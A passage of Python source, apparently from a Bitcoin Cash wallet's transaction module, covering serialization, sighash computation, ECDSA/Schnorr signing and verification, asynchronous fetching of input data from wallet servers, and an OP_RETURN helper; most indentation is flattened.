self.raw = raw
self._inputs = None
self.deserialize()
def inputs(self):
if self._inputs is None:
self.deserialize()
return self._inputs
def outputs(self):
if self._outputs is None:
self.deserialize()
return self._outputs
@classmethod
def get_sorted_pubkeys(self, txin):
# sort pubkeys and x_pubkeys, using the order of pubkeys
# Note: this function is CRITICAL to get the correct order of pubkeys in
# multisignatures; avoid changing.
x_pubkeys = txin['x_pubkeys']
pubkeys = txin.get('pubkeys')
if pubkeys is None:
pubkeys = [xpubkey_to_pubkey(x) for x in x_pubkeys]
pubkeys, x_pubkeys = zip(*sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = pubkeys = list(pubkeys)
txin['x_pubkeys'] = x_pubkeys = list(x_pubkeys)
return pubkeys, x_pubkeys
def update_signatures(self, signatures):
"""Add new signatures to a transaction
`signatures` is expected to be a list of hex encoded sig strings with
*no* sighash byte at the end (implicitly always 0x41 (SIGHASH_FORKID|SIGHASH_ALL);
will be added by this function).
signatures[i] is intended for self._inputs[i].
The signature will be matched with the appropriate pubkey automatically
in the case of multisignature wallets.
This function is used by the Trezor, KeepKey, etc to update the
transaction with signatures from the device.
Note this function supports both Schnorr and ECDSA signatures, but as
yet no hardware wallets are signing Schnorr.
"""
if self.is_complete():
return
if not isinstance(signatures, (tuple, list)):
raise Exception('API changed: update_signatures expects a list.')
if len(self.inputs()) != len(signatures):
raise Exception('expected {} signatures; got {}'.format(len(self.inputs()), len(signatures)))
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
sig = signatures[i]
if not isinstance(sig, str):
raise ValueError("sig was bytes, expected string")
# sig_final is the signature with the sighash byte at the end (0x41)
sig_final = sig + '41'
if sig_final in txin.get('signatures'):
# skip if we already have this signature
continue
pre_hash = Hash(bfh(self.serialize_preimage(i)))
sig_bytes = bfh(sig)
added = False
reason = []
for j, pubkey in enumerate(pubkeys):
# see which pubkey matches this sig (in non-multisig only 1 pubkey, in multisig may be multiple pubkeys)
if self.verify_signature(bfh(pubkey), sig_bytes, pre_hash, reason):
print_error("adding sig", i, j, pubkey, sig_final)
self._inputs[i]['signatures'][j] = sig_final
added = True
if not added:
resn = ', '.join(reversed(reason)) if reason else ''
print_error("failed to add signature {} for any pubkey for reason(s): '{}' ; pubkey(s) / sig / pre_hash = ".format(i, resn),
pubkeys, '/', sig, '/', bh2u(pre_hash))
# redo raw
self.raw = self.serialize()
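# Illustrative sketch (assumes `device_sigs` is a list of hex-encoded ECDSA signatures
# without the trailing sighash byte, one per input, e.g. as produced by a hw keystore):
#
#     tx.update_signatures(device_sigs)
#     signed, required = tx.signature_count()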
def is_schnorr_signed(self, input_idx):
''' Return True IFF any of the signatures for a particular input
are Schnorr signatures (Schnorr signatures are always 64 bytes + 1) '''
if (isinstance(self._inputs, (list, tuple))
and input_idx < len(self._inputs)
and self._inputs[input_idx]):
# Schnorr sigs are always 64 bytes. However the sig has a hash byte
# at the end, so that's 65. Plus we are hex encoded, so 65*2=130
return any(isinstance(sig, (str, bytes)) and len(sig) == 130
for sig in self._inputs[input_idx].get('signatures', []))
return False
def deserialize(self):
if self.raw is None:
return
if self._inputs is not None:
return
d = deserialize(self.raw)
self.invalidate_common_sighash_cache()
self._inputs = d['inputs']
self._outputs = [(x['type'], x['address'], x['value']) for x in d['outputs']]
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in self._outputs)
self.locktime = d['lockTime']
self.version = d['version']
return d
@classmethod
def from_io(klass, inputs, outputs, locktime=0, sign_schnorr=False):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self = klass(None)
self._inputs = inputs
self._outputs = outputs.copy()
self.locktime = locktime
self.set_sign_schnorr(sign_schnorr)
return self
@classmethod
def pay_script(self, output):
return output.to_script().hex()
@classmethod
def estimate_pubkey_size_from_x_pubkey(cls, x_pubkey):
try:
if x_pubkey[0:2] in ['02', '03']: # compressed pubkey
return 0x21
elif x_pubkey[0:2] == '04': # uncompressed pubkey
return 0x41
elif x_pubkey[0:2] == 'ff': # bip32 extended pubkey
return 0x21
elif x_pubkey[0:2] == 'fe': # old electrum extended pubkey
return 0x41
except Exception as e:
pass
return 0x21 # just guess it is compressed
@classmethod
def estimate_pubkey_size_for_txin(cls, txin):
pubkeys = txin.get('pubkeys', [])
x_pubkeys = txin.get('x_pubkeys', [])
if pubkeys and len(pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(pubkeys[0])
elif x_pubkeys and len(x_pubkeys) > 0:
return cls.estimate_pubkey_size_from_x_pubkey(x_pubkeys[0])
else:
return 0x21 # just guess it is compressed
@classmethod
def get_siglist(self, txin, estimate_size=False, sign_schnorr=False):
# if we have enough signatures, we use the actual pubkeys
# otherwise, use extended pubkeys (with bip32 derivation)
num_sig = txin.get('num_sig', 1)
if estimate_size:
pubkey_size = self.estimate_pubkey_size_for_txin(txin)
pk_list = ["00" * pubkey_size] * len(txin.get('x_pubkeys', [None]))
# we assume that signature will be 0x48 bytes long if ECDSA, 0x41 if Schnorr
if sign_schnorr:
siglen = 0x41
else:
siglen = 0x48
sig_list = [ "00" * siglen ] * num_sig
else:
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
is_complete = len(signatures) == num_sig
if is_complete:
pk_list = pubkeys
sig_list = signatures
else:
pk_list = x_pubkeys
sig_list = [sig if sig else NO_SIGNATURE for sig in x_signatures]
return pk_list, sig_list
@classmethod
def input_script(self, txin, estimate_size=False, sign_schnorr=False):
# For already-complete transactions, scriptSig will be set and we prefer
# to use it verbatim in order to get an exact reproduction (including
# malleated push opcodes, etc.).
scriptSig = txin.get('scriptSig', None)
if scriptSig is not None:
return scriptSig
# For partially-signed inputs, or freshly signed transactions, the
# scriptSig will be missing and so we construct it from pieces.
_type = txin['type']
if _type == 'coinbase':
raise RuntimeError('Attempted to serialize coinbase with missing scriptSig')
pubkeys, sig_list = self.get_siglist(txin, estimate_size, sign_schnorr=sign_schnorr)
script = ''.join(push_script(x) for x in sig_list)
if _type == 'p2pk':
pass
elif _type == 'p2sh':
# put op_0 before script
script = '00' + script
redeem_script = multisig_script(pubkeys, txin['num_sig'])
script += push_script(redeem_script)
elif _type == 'p2pkh':
script += push_script(pubkeys[0])
elif _type == 'unknown':
raise RuntimeError('Cannot serialize unknown input with missing scriptSig')
return script
@classmethod
def is_txin_complete(cls, txin):
if txin['type'] == 'coinbase':
return True
num_sig = txin.get('num_sig', 1)
if num_sig == 0:
return True
x_signatures = txin['signatures']
signatures = list(filter(None, x_signatures))
return len(signatures) == num_sig
@classmethod
def get_preimage_script(self, txin):
_type = txin['type']
if _type == 'p2pkh':
return txin['address'].to_script().hex()
elif _type == 'p2sh':
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
return multisig_script(pubkeys, txin['num_sig'])
elif _type == 'p2pk':
pubkey = txin['pubkeys'][0]
return public_key_to_p2pk_script(pubkey)
elif _type == 'unknown':
# this approach enables most P2SH smart contracts (but take care if using OP_CODESEPARATOR)
return txin['scriptCode']
else:
raise RuntimeError('Unknown txin type', _type)
@classmethod
def serialize_outpoint(self, txin):
return bh2u(bfh(txin['prevout_hash'])[::-1]) + int_to_hex(txin['prevout_n'], 4)
@classmethod
def serialize_input(self, txin, script, estimate_size=False):
# Prev hash and index
s = self.serialize_outpoint(txin)
# Script length, script, sequence
s += var_int(len(script)//2)
s += script
s += int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
# offline signing needs to know the input value
if ('value' in txin
and txin.get('scriptSig') is None
and not (estimate_size or self.is_txin_complete(txin))):
s += int_to_hex(txin['value'], 8)
return s
def BIP_LI01_sort(self):
# See https://github.com/kristovatlas/rfc/blob/master/bips/bip-li01.mediawiki
self._inputs.sort(key = lambda i: (i['prevout_hash'], i['prevout_n']))
self._outputs.sort(key = lambda o: (o[2], self.pay_script(o[1])))
def serialize_output(self, output):
output_type, addr, amount = output
s = int_to_hex(amount, 8)
script = self.pay_script(addr)
s += var_int(len(script)//2)
s += script
return s
@classmethod
def nHashType(cls):
'''Hash type in hex.'''
warnings.warn("warning: deprecated tx.nHashType()", FutureWarning, stacklevel=2)
return 0x01 | (cls.SIGHASH_FORKID + (cls.FORKID << 8))
def invalidate_common_sighash_cache(self):
''' Call this to invalidate the cached common sighash (computed by
`calc_common_sighash` below).
This function is for advanced usage of this class where the caller
has mutated the transaction after computing its signatures and would
like to explicitly delete the cached common sighash. See
`calc_common_sighash` below. '''
try: del self._cached_sighash_tup
except AttributeError: pass
def calc_common_sighash(self, use_cache=False):
""" Calculate the common sighash components that are used by
transaction signatures. If `use_cache` enabled then this will return
already-computed values from the `._cached_sighash_tup` attribute, or
compute them if necessary (and then store).
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Returns three 32-long bytes objects: (hashPrevouts, hashSequence, hashOutputs).
Warning: If you modify non-signature parts of the transaction
afterwards, this cache will be wrong! """
inputs = self.inputs()
outputs = self.outputs()
meta = (len(inputs), len(outputs))
if use_cache:
try:
cmeta, res = self._cached_sighash_tup
except AttributeError:
pass
else:
# minimal heuristic check to detect bad cached value
if cmeta == meta:
# cache hit and heuristic check ok
return res
else:
del cmeta, res, self._cached_sighash_tup
hashPrevouts = Hash(bfh(''.join(self.serialize_outpoint(txin) for txin in inputs)))
hashSequence = Hash(bfh(''.join(int_to_hex(txin.get('sequence', 0xffffffff - 1), 4) for txin in inputs)))
hashOutputs = Hash(bfh(''.join(self.serialize_output(o) for o in outputs)))
res = hashPrevouts, hashSequence, hashOutputs
# cache the resulting value, along with some minimal metadata to defensively
# program against cache invalidation (due to class mutation).
self._cached_sighash_tup = meta, res
return res
def serialize_preimage(self, i, nHashType=0x00000041, use_cache = False):
""" See `.calc_common_sighash` for explanation of use_cache feature """
if (nHashType & 0xff) != 0x41:
raise ValueError("other hashtypes not supported; submit a PR to fix this!")
nVersion = int_to_hex(self.version, 4)
nHashType = int_to_hex(nHashType, 4)
nLocktime = int_to_hex(self.locktime, 4)
txin = self.inputs()[i]
outpoint = self.serialize_outpoint(txin)
preimage_script = self.get_preimage_script(txin)
scriptCode = var_int(len(preimage_script) // 2) + preimage_script
try:
amount = int_to_hex(txin['value'], 8)
except KeyError:
raise InputValueMissing
nSequence = int_to_hex(txin.get('sequence', 0xffffffff - 1), 4)
hashPrevouts, hashSequence, hashOutputs = self.calc_common_sighash(use_cache = use_cache)
preimage = nVersion + bh2u(hashPrevouts) + bh2u(hashSequence) + outpoint + scriptCode + amount + nSequence + bh2u(hashOutputs) + nLocktime + nHashType
return preimage
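# For reference, the preimage assembled above follows the BIP143-style layout used
# with SIGHASH_ALL|FORKID (0x41):
#   nVersion | hashPrevouts | hashSequence | outpoint | scriptCode | amount |
#   nSequence | hashOutputs | nLocktime | nHashType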
def serialize(self, estimate_size=False):
nVersion = int_to_hex(self.version, 4)
nLocktime = int_to_hex(self.locktime, 4)
inputs = self.inputs()
outputs = self.outputs()
txins = var_int(len(inputs)) + ''.join(self.serialize_input(txin, self.input_script(txin, estimate_size, self._sign_schnorr), estimate_size) for txin in inputs)
txouts = var_int(len(outputs)) + ''.join(self.serialize_output(o) for o in outputs)
return nVersion + txins + txouts + nLocktime
def hash(self):
warnings.warn("warning: deprecated tx.hash()", FutureWarning, stacklevel=2)
return self.txid()
def txid(self):
if not self.is_complete():
return None
ser = self.serialize()
return self._txid(ser)
def txid_fast(self):
''' Returns the txid by immediately calculating it from self.raw,
which is faster than calling txid() which does a full re-serialize
each time. Note this should only be used for tx's that you KNOW are
complete and that don't contain our funny serialization hacks.
(The is_complete check is also not performed here because that
potentially can lead to unwanted tx deserialization). '''
if self.raw:
return self._txid(self.raw)
return self.txid()
@staticmethod
def _txid(raw_hex : str) -> str:
return bh2u(Hash(bfh(raw_hex))[::-1])
def add_inputs(self, inputs):
self._inputs.extend(inputs)
self.raw = None
def add_outputs(self, outputs):
assert all(isinstance(output[1], (PublicKey, Address, ScriptOutput))
for output in outputs)
self._outputs.extend(outputs)
self.raw = None
def input_value(self):
''' Will return the sum of all input values, if the input values
are known (may consult self.fetched_inputs() to get a better idea of
possible input values). Will raise InputValueMissing if input values
are missing. '''
try:
return sum(x['value'] for x in (self.fetched_inputs() or self.inputs()))
except (KeyError, TypeError, ValueError) as e:
raise InputValueMissing from e
def output_value(self):
return sum(val for tp, addr, val in self.outputs())
def get_fee(self):
''' Try and calculate the fee based on the input data, and returns it as
satoshis (int). Can raise InputValueMissing on tx's where fee data is
missing, so client code should catch that. '''
# first, check if coinbase; coinbase tx always has 0 fee
if self.inputs() and self._inputs[0].get('type') == 'coinbase':
return 0
# otherwise just sum up all values - may raise InputValueMissing
return self.input_value() - self.output_value()
@profiler
def estimated_size(self):
'''Return an estimated tx size in bytes.'''
return (len(self.serialize(True)) // 2 if not self.is_complete() or self.raw is None
else len(self.raw) // 2) # ASCII hex string
@classmethod
def estimated_input_size(self, txin, sign_schnorr=False):
'''Return an estimate of the serialized input size in bytes.'''
script = self.input_script(txin, True, sign_schnorr=sign_schnorr)
return len(self.serialize_input(txin, script, True)) // 2 # ASCII hex string
def signature_count(self):
r = 0
s = 0
for txin in self.inputs():
if txin['type'] == 'coinbase':
continue
signatures = list(filter(None, txin.get('signatures',[])))
s += len(signatures)
r += txin.get('num_sig', -1)
return s, r
def is_complete(self):
s, r = self.signature_count()
return r == s
@staticmethod
def verify_signature(pubkey, sig, msghash, reason=None):
''' Given a pubkey (bytes), signature (bytes -- without sighash byte),
and a sha256d message digest, returns True iff the signature is good
for the given public key, False otherwise. Does not raise normally
unless given bad or garbage arguments.
Optional arg 'reason' should be a list which will have a string pushed
at the front (failure reason) on False return. '''
if (any(not arg or not isinstance(arg, bytes) for arg in (pubkey, sig, msghash))
or len(msghash) != 32):
raise ValueError('bad arguments to verify_signature')
if len(sig) == 64:
# Schnorr signatures are always exactly 64 bytes
return schnorr.verify(pubkey, sig, msghash)
else:
from ecdsa import BadSignatureError, BadDigestError
from ecdsa.der import UnexpectedDER
# ECDSA signature
try:
pubkey_point = ser_to_point(pubkey)
vk = MyVerifyingKey.from_public_point(pubkey_point, curve=SECP256k1)
if vk.verify_digest(sig, msghash, sigdecode = ecdsa.util.sigdecode_der):
return True
except (AssertionError, ValueError, TypeError,
BadSignatureError, BadDigestError, UnexpectedDER) as e:
# ser_to_point will fail if pubkey is off-curve, infinity, or garbage.
# verify_digest may also raise BadDigestError and BadSignatureError
if isinstance(reason, list):
reason.insert(0, repr(e))
except BaseException as e:
print_error("[Transaction.verify_signature] unexpected exception", repr(e))
if isinstance(reason, list):
reason.insert(0, repr(e))
return False
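# Illustrative sketch (placeholder values): checking a signature against a compressed
# pubkey and a 32-byte sha256d digest; `reasons` collects a failure reason, if any.
#
#     reasons = []
#     ok = Transaction.verify_signature(pubkey_bytes, sig_bytes, digest32, reasons)
#     if not ok:
#         print('verification failed:', reasons and reasons[0])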
@staticmethod
def _ecdsa_sign(sec, pre_hash):
pkey = regenerate_key(sec)
secexp = pkey.secret
private_key = MySigningKey.from_secret_exponent(secexp, curve = SECP256k1)
public_key = private_key.get_verifying_key()
sig = private_key.sign_digest_deterministic(pre_hash, hashfunc=hashlib.sha256, sigencode = ecdsa.util.sigencode_der)
assert public_key.verify_digest(sig, pre_hash, sigdecode = ecdsa.util.sigdecode_der)
return sig
@staticmethod
def _schnorr_sign(pubkey, sec, pre_hash):
pubkey = bytes.fromhex(pubkey)
sig = schnorr.sign(sec, pre_hash)
assert schnorr.verify(pubkey, sig, pre_hash) # verify what we just signed
return sig
def sign(self, keypairs, *, use_cache=False):
for i, txin in enumerate(self.inputs()):
pubkeys, x_pubkeys = self.get_sorted_pubkeys(txin)
for j, (pubkey, x_pubkey) in enumerate(zip(pubkeys, x_pubkeys)):
if self.is_txin_complete(txin):
# txin is complete
break
if pubkey in keypairs:
_pubkey = pubkey
kname = 'pubkey'
elif x_pubkey in keypairs:
_pubkey = x_pubkey
kname = 'x_pubkey'
else:
continue
print_error(f"adding signature for input#{i} sig#{j}; {kname}: {_pubkey} schnorr: {self._sign_schnorr}")
sec, compressed = keypairs.get(_pubkey)
self._sign_txin(i, j, sec, compressed, use_cache=use_cache)
print_error("is_complete", self.is_complete())
self.raw = self.serialize()
def _sign_txin(self, i, j, sec, compressed, *, use_cache=False):
'''Note: precondition is self._inputs is valid (ie: tx is already deserialized)'''
pubkey = public_key_from_private_key(sec, compressed)
# add signature
nHashType = 0x00000041 # hardcoded, perhaps should be taken from unsigned input dict
pre_hash = Hash(bfh(self.serialize_preimage(i, nHashType, use_cache=use_cache)))
if self._sign_schnorr:
sig = self._schnorr_sign(pubkey, sec, pre_hash)
else:
sig = self._ecdsa_sign(sec, pre_hash)
reason = []
if not self.verify_signature(bfh(pubkey), sig, pre_hash, reason=reason):
print_error(f"Signature verification failed for input#{i} sig#{j}, reason: {str(reason)}")
return None
txin = self._inputs[i]
txin['signatures'][j] = bh2u(sig + bytes((nHashType & 0xff,)))
txin['pubkeys'][j] = pubkey # needed for fd keys
return txin
def get_outputs(self):
"""convert pubkeys to addresses"""
o = []
for type, addr, v in self.outputs():
o.append((addr,v)) # consider using yield (addr, v)
return o
def get_output_addresses(self):
return [addr for addr, val in self.get_outputs()]
def has_address(self, addr):
return (addr in self.get_output_addresses()) or (addr in (tx.get("address") for tx in self.inputs()))
def is_final(self):
return not any([x.get('sequence', 0xffffffff - 1) < 0xffffffff - 1
for x in self.inputs()])
def as_dict(self):
if self.raw is None:
self.raw = self.serialize()
self.deserialize()
out = {
'hex': self.raw,
'complete': self.is_complete(),
'final': self.is_final(),
}
return out
# This cache stores foreign (non-wallet) tx's we fetched from the network
# for the purposes of the "fetch_input_data" mechanism. Its max size has
# been thoughtfully calibrated to provide a decent tradeoff between
# memory consumption and UX.
#
# In even aggressive/pathological cases this cache won't ever exceed
# 100MB even when full. [see ExpiringCache.size_bytes() to test it].
# This is acceptable considering this is Python + Qt and it eats memory
# anyway.. and also this is 2019 ;). Note that all tx's in this cache
# are in the non-deserialized state (hex encoded bytes only) as a memory
# savings optimization. Please maintain that invariant if you modify this
# code, otherwise the cache may grow to 10x memory consumption if you
# put deserialized tx's in here.
_fetched_tx_cache = ExpiringCache(maxlen=1000, name="TransactionFetchCache")
def fetch_input_data(self, wallet, done_callback=None, done_args=tuple(),
prog_callback=None, *, force=False, use_network=True):
'''
Fetch all input data and put it in the 'ephemeral' dictionary, under
'fetched_inputs'. This call potentially initiates fetching of
prevout_hash transactions from the network for all inputs to this tx.
The fetched data is basically used for the Transaction dialog to be able
to display fee, actual address, and amount (value) for tx inputs.
`wallet` should ideally have a network object, but this function still
will work and is still useful if it does not.
`done_callback` is called with `done_args` (only if True was returned),
upon completion. Note that done_callback won't be called if this function
returns False. Also note that done_callback runs in a non-main thread
context and as such, if you want to do GUI work from within it, use
the appropriate Qt signal/slot mechanism to dispatch work to the GUI.
`prog_callback`, if specified, is called periodically to indicate
progress after inputs are retrieved, and it is passed a single arg,
"percent" (eg: 5.1, 10.3, 26.3, 76.1, etc) to indicate percent progress.
Note 1: Results (fetched transactions) are cached, so subsequent
calls to this function for the same transaction are cheap.
Note 2: Multiple, rapid calls to this function will cause the previous
asynchronous fetch operation (if active) to be canceled and only the
latest call will result in the invocation of the done_callback if/when
it completes.
'''
if not self._inputs:
return False
if force:
# forced-run -- start with empty list
inps = []
else:
# may be a new list or list that was already in dict
inps = self.fetched_inputs(require_complete = True)
if len(self._inputs) == len(inps):
# we already have results, don't do anything.
return False
eph = self.ephemeral
eph['fetched_inputs'] = inps = inps.copy() # paranoia: in case another thread is running on this list
# Lazy imports to keep this functionality very self-contained
# These modules are always available so no need to globally import them.
import threading
import queue
import time
from copy import deepcopy
from collections import defaultdict
t0 = time.time()
t = None
cls = __class__
self_txid = self.txid()
def doIt():
'''
This function is seemingly complex, but it's really conceptually
simple:
1. Fetch all prevouts either from cache (wallet or global tx_cache)
2. Or, if they aren't in either cache, then we will asynchronously
queue the raw tx gets to the network in parallel, across *all*
our connected servers. This is very fast, and spreads the load
around.
Tested with a huge tx of 600+ inputs all coming from different
prevout_hashes on mainnet, and it's super fast:
cd8fcc8ad75267ff9ad314e770a66a9e871be7882b7c05a7e5271c46bfca98bc '''
last_prog = -9999.0
need_dl_txids = defaultdict(list) # the dict of txids we will need to download (wasn't in cache)
def prog(i, prog_total=100):
''' notify interested code about progress '''
nonlocal last_prog
if prog_callback:
prog = ((i+1)*100.0)/prog_total
if prog - last_prog > 5.0:
prog_callback(prog)
last_prog = prog
while eph.get('_fetch') == t and len(inps) < len(self._inputs):
i = len(inps)
inp = deepcopy(self._inputs[i])
typ, prevout_hash, n, addr, value = inp.get('type'), inp.get('prevout_hash'), inp.get('prevout_n'), inp.get('address'), inp.get('value')
if not prevout_hash or n is None:
raise RuntimeError('Missing prevout_hash and/or prevout_n')
if typ != 'coinbase' and (not isinstance(addr, Address) or value is None):
tx = cls.tx_cache_get(prevout_hash) or wallet.transactions.get(prevout_hash)
if tx:
# Tx was in cache or wallet.transactions, proceed
# note that the tx here should be in the "not
# deserialized" state
if tx.raw:
# Note we deserialize a *copy* of the tx so as to
# save memory. We do not want to deserialize the
# cached tx because if we do so, the cache will
# contain a deserialized tx which will take up
# several times the memory when deserialized due to
# Python's memory use being less efficient than the
# binary-only raw bytes. So if you modify this code
# do bear that in mind.
tx = Transaction(tx.raw)
try:
tx.deserialize()
# The below txid check is commented-out as
# we trust wallet tx's and the network
# tx's that fail this check are never
# put in cache anyway.
#txid = tx._txid(tx.raw)
#if txid != prevout_hash: # sanity check
# print_error("fetch_input_data: cached prevout_hash {} != tx.txid() {}, ignoring.".format(prevout_hash, txid))
except Exception as e:
print_error("fetch_input_data: WARNING failed to deserialize {}: {}".format(prevout_hash, repr(e)))
tx = None
else:
tx = None
print_error("fetch_input_data: WARNING cached tx lacked any 'raw' bytes for {}".format(prevout_hash))
# now, examine the deserialized tx, if it's still good
if tx:
if n < len(tx.outputs()):
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inp['value'] = value
inp['address'] = addr
print_error("fetch_input_data: fetched cached", i, addr, value)
else:
print_error("fetch_input_data: ** FIXME ** should never happen -- n={} >= len(tx.outputs())={} for prevout {}".format(n, len(tx.outputs()), prevout_hash))
else:
# tx was not in cache or wallet.transactions, mark
# it for download below (this branch can also execute
# in the unlikely case where there was an error above)
need_dl_txids[prevout_hash].append((i, n)) # remember the input# as well as the prevout_n
inps.append(inp) # append either cached result or as-yet-incomplete copy of _inputs[i]
# Now, download the tx's we didn't find above if network is available
            # and the caller said it's ok to go out to the network; otherwise just return
# what we have
if use_network and eph.get('_fetch') == t and wallet.network:
callback_funcs_to_cancel = set()
try: # the whole point of this try block is the `finally` way below...
prog(-1) # tell interested code that progress is now 0%
# Next, queue the transaction.get requests, spreading them
# out randomly over the connected interfaces
q = queue.Queue()
q_ct = 0
bad_txids = set()
def put_in_queue_and_cache(r):
''' we cache the results directly in the network callback
as even if the user cancels the operation, we would like
to save the returned tx in our cache, since we did the
work to retrieve it anyway. '''
q.put(r) # put the result in the queue no matter what it is
txid = ''
try:
# Below will raise if response was 'error' or
# otherwise invalid. Note: for performance reasons
# we don't validate the tx here or deserialize it as
# this function runs in the network thread and we
# don't want to eat up that thread's CPU time
# needlessly. Also note the cache doesn't store
                            # deserialized tx's so as to save memory. We
# always deserialize a copy when reading the cache.
tx = Transaction(r['result'])
txid = r['params'][0]
assert txid == cls._txid(tx.raw), "txid-is-sane-check" # protection against phony responses
cls.tx_cache_put(tx=tx, txid=txid) # save tx to cache here
except Exception as e:
# response was not valid, ignore (don't cache)
if txid: # txid may be '' if KeyError from r['result'] above
bad_txids.add(txid)
print_error("fetch_input_data: put_in_queue_and_cache fail for txid:", txid, repr(e))
for txid, l in need_dl_txids.items():
wallet.network.queue_request('blockchain.transaction.get', [txid],
interface='random',
callback=put_in_queue_and_cache)
callback_funcs_to_cancel.add(put_in_queue_and_cache)
q_ct += 1
def get_bh():
if eph.get('block_height'):
return False
lh = wallet.network.get_server_height() or wallet.get_local_height()
def got_tx_info(r):
q.put('block_height') # indicate to other thread we got the block_height reply from network
try:
                                confs = r.get('result').get('confirmations', 0)  # will raise on an error reply
if confs and lh:
# the whole point.. was to get this piece of data.. the block_height
eph['block_height'] = bh = lh - confs + 1
print_error('fetch_input_data: got tx block height', bh)
else:
print_error('fetch_input_data: tx block height could not be determined')
except Exception as e:
print_error('fetch_input_data: get_bh fail:', str(e), r)
if self_txid:
wallet.network.queue_request('blockchain.transaction.get', [self_txid,True],
interface=None, callback=got_tx_info)
callback_funcs_to_cancel.add(got_tx_info)
return True
if get_bh():
q_ct += 1
class ErrorResp(Exception):
pass
for i in range(q_ct):
# now, read the q back, with a 10 second timeout, and
# populate the inputs
try:
r = q.get(timeout=10)
if eph.get('_fetch') != t:
# early abort from func, canceled
break
if r == 'block_height':
# ignore block_height reply from network.. was already processed in other thread in got_tx_info above
continue
if r.get('error'):
msg = r.get('error')
if isinstance(msg, dict):
msg = msg.get('message') or 'unknown error'
raise ErrorResp(msg)
rawhex = r['result']
txid = r['params'][0]
assert txid not in bad_txids, "txid marked bad" # skip if was marked bad by our callback code
tx = Transaction(rawhex); tx.deserialize()
for item in need_dl_txids[txid]:
ii, n = item
assert n < len(tx.outputs())
outp = tx.outputs()[n]
addr, value = outp[1], outp[2]
inps[ii]['value'] = value
inps[ii]['address'] = addr
print_error("fetch_input_data: fetched from network", ii, addr, value)
prog(i, q_ct) # tell interested code of progress
except queue.Empty:
print_error("fetch_input_data: timed out after 10.0s fetching from network, giving up.")
break
except Exception as e:
print_error("fetch_input_data:", repr(e))
finally:
# force-cancel any extant requests -- this is especially
# crucial on error/timeout/failure.
for func in callback_funcs_to_cancel:
wallet.network.cancel_requests(func)
if len(inps) == len(self._inputs) and eph.get('_fetch') == t: # sanity check
eph.pop('_fetch', None) # potential race condition here, popping wrong t -- but in practice w/ CPython threading it won't matter
print_error(f"fetch_input_data: elapsed {(time.time()-t0):.4f} sec")
if done_callback:
done_callback(*done_args)
# /doIt
t = threading.Thread(target=doIt, daemon=True)
eph['_fetch'] = t
t.start()
return True
def fetched_inputs(self, *, require_complete=False):
''' Returns the complete list of asynchronously fetched inputs for
this tx, if they exist. If the list is not yet fully retrieved, and
require_complete == False, returns what it has so far
        (the returned list will always have exactly len(self._inputs) items,
with not-yet downloaded inputs coming from self._inputs and not
necessarily containing a good 'address' or 'value').
If the download failed completely or was never started, will return the
empty list [].
Note that some inputs may still lack key: 'value' if there was a network
error in retrieving them or if the download is still in progress.'''
if self._inputs:
ret = self.ephemeral.get('fetched_inputs') or []
diff = len(self._inputs) - len(ret)
if diff > 0 and self.ephemeral.get('_fetch') and not require_complete:
# in progress.. so return what we have so far
return ret + self._inputs[len(ret):]
elif diff == 0 and (not require_complete or not self.ephemeral.get('_fetch')):
# finished *or* in-progress and require_complete==False
return ret
return []
def fetch_cancel(self) -> bool:
''' Cancels the currently-active running fetch operation, if any '''
return bool(self.ephemeral.pop('_fetch', None))
@classmethod
def tx_cache_get(cls, txid : str) -> object:
''' Attempts to retrieve txid from the tx cache that this class
keeps in-memory. Returns None on failure. The returned tx is
not deserialized, and is a copy of the one in the cache. '''
tx = cls._fetched_tx_cache.get(txid)
if tx is not None and tx.raw:
            # make sure to return a copy of the transaction from the cache,
            # so that if the caller does .deserialize(), it is *their* instance
            # that takes the ~10x memory hit, and not the cached instance,
            # which should stay as an undeserialized raw tx.
return Transaction(tx.raw)
return None
@classmethod
def tx_cache_put(cls, tx : object, txid : str = None):
''' Puts a non-deserialized copy of tx into the tx_cache. '''
if not tx or not tx.raw:
raise ValueError('Please pass a tx which has a valid .raw attribute!')
txid = txid or cls._txid(tx.raw) # optionally, caller can pass-in txid to save CPU time for hashing
cls._fetched_tx_cache.put(txid, Transaction(tx.raw))
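# --- Hedged usage sketch (not part of the original file) ---------------------
# Illustrates how a caller might drive the fetch machinery above: start
# fetch_input_data(), then read results via fetched_inputs().  `tx` is assumed
# to be an instance of this module's Transaction class and `wallet` a wallet
# object with an optional .network attribute; the callbacks are illustrative.
def _example_fetch_input_data(tx, wallet):
    def on_done():
        # runs in a worker thread; real GUI code should hop back via Qt signals
        for inp in tx.fetched_inputs(require_complete=True):
            print_error("input", inp.get('address'), inp.get('value'))
    def on_progress(percent):
        print_error("fetch progress: %.1f%%" % percent)
    started = tx.fetch_input_data(wallet, done_callback=on_done,
                                  prog_callback=on_progress)
    if not started:
        # False means nothing to fetch (no inputs, or results already complete)
        on_done()
    return started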
def tx_from_str(txt):
"json or raw hexadecimal"
import json
txt = txt.strip()
if not txt:
raise ValueError("empty string")
try:
bfh(txt)
is_hex = True
except:
is_hex = False
if is_hex:
return txt
tx_dict = json.loads(str(txt))
assert "hex" in tx_dict.keys()
return tx_dict["hex"]
# ---
class OPReturn:
''' OPReturn helper namespace. Used by GUI main_window.py and also
electroncash/commands.py '''
class Error(Exception):
""" thrown when the OP_RETURN for a tx not of the right format """
class TooLarge(Error):
""" thrown when the OP_RETURN for a tx is >220 bytes """
@staticmethod
def output_for_stringdata(op_return):
from .i18n import _
if not isinstance(op_return, str):
raise OPReturn.Error('OP_RETURN parameter needs to be of type str!')
op_return_code = "OP_RETURN "
op_return_encoded = op_return.encode('utf-8')
if len(op_return_encoded) > 220:
raise OPReturn.TooLarge(_("OP_RETURN message too large, needs to be no longer than 220 bytes"))
op_return_payload = op_return_encoded.hex()
script = op_return_code + op_return_payload
amount = 0
return (TYPE_SCRIPT, ScriptOutput.from_string(script), amount)
@staticmethod
def output_for_rawhex(op_return):
from .i18n import _
